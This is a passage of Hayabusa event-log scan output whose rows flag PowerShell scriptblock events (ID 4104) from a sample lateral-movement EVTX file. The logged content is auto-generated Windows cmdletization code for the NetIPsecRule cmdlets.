(@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 